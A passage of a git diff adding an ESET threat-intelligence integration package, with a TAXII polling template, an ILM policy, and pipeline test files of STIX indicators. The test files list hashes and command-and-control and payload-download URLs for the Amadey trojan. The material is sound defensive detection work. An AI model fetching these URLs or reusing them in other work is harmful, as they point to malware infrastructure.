details. + diff --git a/packages/ti_eset/data_stream/apt/sample_event.json b/packages/ti_eset/data_stream/apt/sample_event.json new file mode 100644 index 00000000000..fb1a68be57d --- /dev/null +++ b/packages/ti_eset/data_stream/apt/sample_event.json @@ -0,0 +1,71 @@ +{ + "@timestamp": "2023-09-29T08:48:42.000Z", + "agent": { + "ephemeral_id": "aca3c3ca-0233-4da9-aa4d-67883702e60b", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.apt", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", + "meta_category": "file", + "name": "file", + "valid_until": "2024-09-28T08:48:42.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:17:00.528Z", + "dataset": "ti_eset.apt", + "ingested": "2024-03-27T14:17:10Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-09-29T08:48:42.000Z\",\"created_by_ref\":\"identity--55f6ea5e-51ac-4344-bc8c-4170950d210f\",\"id\":\"indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382\",\"kill_chain_phases\":[{\"kill_chain_name\":\"misp-category\",\"phase_name\":\"file\"}],\"labels\":[\"misp:name=\\\"file\\\"\",\"misp:meta-category=\\\"file\\\"\",\"misp:to_ids=\\\"True\\\"\"],\"modified\":\"2023-09-29T08:48:42.000Z\",\"pattern\":\"[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-09-26T07:00:04Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-apt" + ], + "threat": { + "feed": { + "name": "ESET APT stix 2.1" + }, + "indicator": { + "confidence": "High", + "file": { + "hash": { + "md5": "7196b26572d2c357a17599b9a0d71d33", + "sha1": "a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0", + "sha256": "6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e" + }, + "name": "KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3" + }, + "last_seen": "2023-09-29T08:48:42.000Z", + "modified_at": "2023-09-29T08:48:42.000Z", + "provider": "eset", + "type": "file" + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..438a8b68c98 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log @@ -0,0 +1,10 @@ +{"id": "indicator--cff76e38-b2f0-4777-88a0-758ad0dce832", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "373d34874d7bc89fd4cefa6272ee80bf", "description": "Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[file:hashes.'SHA-256'='d3444b38c6e1224665a86a71d686355c98c6f62e2ee6a55ca12f2dcb87bb8f4e'] OR [file:hashes.'SHA-1'='cc2b68a6e60896d8d87f54a97f129ac1c24b25c1'] OR [file:hashes.'MD5'='aadae3d8fe65ac7cfc2c782293e6c60c']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--4db7b816-e2d4-4efb-8780-939f1378873c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.124.1/theme/index.php']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--7608f5a5-f6cb-4d1c-bd4b-05f195d20ce9", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.68.52/fuza/sus.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--34730a14-9027-416b-af6c-50a425fd4b05", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.68.52/fuza/foto3553.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--302bb8b1-bd56-46f4-a5ec-fc57eabec6e3", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.68.52/fuza/nalo.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--f90799cf-307e-43d4-9716-afb24d3ce10a", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.124.1/theme/Plugins/clip64.dll']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--8a199d9a-f5dc-4cd9-88c1-6ed637e07eb7", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.124.1/theme/Plugins']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--e8bdd70f-789d-4666-8389-8cc311ab5355", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://77.91.68.52/fuza']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--f3880694-81c9-487e-b32f-7409b30c78e4", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:07.000Z", "modified": "2023-10-15T02:10:07.000Z", "name": "373d34874d7bc89fd4cefa6272ee80bf", "description": "Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[file:hashes.'SHA-256'='d655a0410186269feccdf8ba3bd1eb0cdb066a45fc92cb4ce2dc8cd80a05c552'] OR [file:hashes.'SHA-1'='b1dee45e96433e0a73e3b3d39dde3a7779ff3183'] OR [file:hashes.'MD5'='7f160411fd74b895ad7b89388a441bb5']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:07Z", "valid_until": "2023-10-17T02:10:07Z", "labels": ["malicious-activity"]} +{"id": "indicator--b48a316c-8068-4a0a-b657-eea457ae21ef", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:07.000Z", "modified": "2023-10-15T02:10:07.000Z", "name": "example.com", "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", "pattern": "[url:value = 'http://5.42.65.80/8bmeVwqx/index.php']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:07Z", "valid_until": "2023-10-17T02:10:07Z", "labels": ["malicious-activity"]} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..7688d4b6225 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/_dev/test/pipeline/test-eset-ndjson.log-expected.json @@ -0,0 +1,442 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--cff76e38-b2f0-4777-88a0-758ad0dce832", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--cff76e38-b2f0-4777-88a0-758ad0dce832\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"373d34874d7bc89fd4cefa6272ee80bf\", \"description\": \"Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='d3444b38c6e1224665a86a71d686355c98c6f62e2ee6a55ca12f2dcb87bb8f4e'] OR [file:hashes.'SHA-1'='cc2b68a6e60896d8d87f54a97f129ac1c24b25c1'] OR [file:hashes.'MD5'='aadae3d8fe65ac7cfc2c782293e6c60c']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.", + "file": { + "hash": { + "md5": "aadae3d8fe65ac7cfc2c782293e6c60c", + "sha1": "cc2b68a6e60896d8d87f54a97f129ac1c24b25c1", + "sha256": "d3444b38c6e1224665a86a71d686355c98c6f62e2ee6a55ca12f2dcb87bb8f4e" + } + }, + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "373d34874d7bc89fd4cefa6272ee80bf", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--4db7b816-e2d4-4efb-8780-939f1378873c", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--4db7b816-e2d4-4efb-8780-939f1378873c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.124.1/theme/index.php']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/index.php" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--7608f5a5-f6cb-4d1c-bd4b-05f195d20ce9", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--7608f5a5-f6cb-4d1c-bd4b-05f195d20ce9\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.68.52/fuza/sus.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/sus.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--34730a14-9027-416b-af6c-50a425fd4b05", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--34730a14-9027-416b-af6c-50a425fd4b05\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.68.52/fuza/foto3553.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/foto3553.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--302bb8b1-bd56-46f4-a5ec-fc57eabec6e3", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--302bb8b1-bd56-46f4-a5ec-fc57eabec6e3\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.68.52/fuza/nalo.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/nalo.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--f90799cf-307e-43d4-9716-afb24d3ce10a", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--f90799cf-307e-43d4-9716-afb24d3ce10a\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.124.1/theme/Plugins/clip64.dll']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/Plugins/clip64.dll" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--8a199d9a-f5dc-4cd9-88c1-6ed637e07eb7", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--8a199d9a-f5dc-4cd9-88c1-6ed637e07eb7\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.124.1/theme/Plugins']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/Plugins" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e8bdd70f-789d-4666-8389-8cc311ab5355", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--e8bdd70f-789d-4666-8389-8cc311ab5355\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://77.91.68.52/fuza']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:10:07.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--f3880694-81c9-487e-b32f-7409b30c78e4", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:10:07.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--f3880694-81c9-487e-b32f-7409b30c78e4\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:07.000Z\", \"modified\": \"2023-10-15T02:10:07.000Z\", \"name\": \"373d34874d7bc89fd4cefa6272ee80bf\", \"description\": \"Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='d655a0410186269feccdf8ba3bd1eb0cdb066a45fc92cb4ce2dc8cd80a05c552'] OR [file:hashes.'SHA-1'='b1dee45e96433e0a73e3b3d39dde3a7779ff3183'] OR [file:hashes.'MD5'='7f160411fd74b895ad7b89388a441bb5']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:07Z\", \"valid_until\": \"2023-10-17T02:10:07Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of Win32/TrojanDownloader.Amadey.A trojan is present.", + "file": { + "hash": { + "md5": "7f160411fd74b895ad7b89388a441bb5", + "sha1": "b1dee45e96433e0a73e3b3d39dde3a7779ff3183", + "sha256": "d655a0410186269feccdf8ba3bd1eb0cdb066a45fc92cb4ce2dc8cd80a05c552" + } + }, + "last_seen": "2023-10-15T02:10:07.000Z", + "modified_at": "2023-10-15T02:10:07.000Z", + "name": "373d34874d7bc89fd4cefa6272ee80bf", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T02:10:07.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--b48a316c-8068-4a0a-b657-eea457ae21ef", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:10:07.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--b48a316c-8068-4a0a-b657-eea457ae21ef\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:07.000Z\", \"modified\": \"2023-10-15T02:10:07.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://5.42.65.80/8bmeVwqx/index.php']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:07Z\", \"valid_until\": \"2023-10-17T02:10:07Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:10:07.000Z", + "modified_at": "2023-10-15T02:10:07.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://5.42.65.80/8bmeVwqx/index.php" + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/botnet/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/botnet/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..9797b7b31fb --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_eset/data_stream/botnet/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/botnet/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/agent/stream/httpjson.yml.hbs @@ -0,0 +1,72 @@ +config_version: "2" + +interval: {{interval}} +request.method: "GET" +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +{{/if}} + +auth.basic.user: {{username}} +auth.basic.password: {{password}} + +{{#if url}} +request.url: {{url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +{{#if proxy_url}} +request.proxy_url: {{proxy_url}} +{{/if}} + +request.transforms: + - set: + target: header.Content-Type + value: application/taxii+json;version=2.1 + - set: + target: header.Accept + value: application/taxii+json;version=2.1 + - set: + target: url.params.match[type] + value: indicator + - set: + target: url.params.limit + value: {{page_size}} + - set: + target: url.params.added_after + value: '[[ .cursor.timestamp ]]' + default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]' + +response.pagination: + - set: + target: url.params.added_after + value: >- + [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]] + fail_on_template_error: true + +response.split: + target: body.objects + +cursor: + timestamp: + value: >- + [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]] + ignore_empty_value: true + +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_eset/data_stream/botnet/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/botnet/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..459c9fffc4e --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "delete": { + "actions": { + "delete": {} + }, + "min_age": "7d" + }, + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/botnet/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/botnet/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..092c626f7b2 --- /dev/null +++ 